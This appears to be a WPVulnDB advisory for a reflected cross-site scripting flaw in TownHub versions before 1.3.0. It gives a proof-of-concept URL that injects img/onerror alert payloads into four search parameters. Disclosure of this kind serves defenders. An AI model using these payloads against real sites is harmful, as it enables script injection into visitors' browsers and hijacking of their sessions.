TownHub < 1.3.0 - Unauthenticated Reflected XSS

2020-06-19T00:00:00
ID WPVDB-ID:10274
Type wpvulndb
Reporter VLΛD VΞCTOR
Modified 2020-06-20T00:00:00

Description

WordPress Vulnerability - TownHub < 1.3.0 - Unauthenticated Reflected XSS

PoC

https://example.com/?search_term=&location;_search=%22%3E%3Cimg%20src=x%20onerror=alert(XSS1)%3E&distance;=%22%3E%3Cimg%20src=x%20onerror=alert(XSS2)%3E&nearby;=&address;_lat=%22%3E%3Cimg%20src=x%20onerror=alert(XSS3)%3E&address;_lng=%22%3E%3Cimg%20src=x%20onerror=alert(XSS4)%3E&lcats;[]=195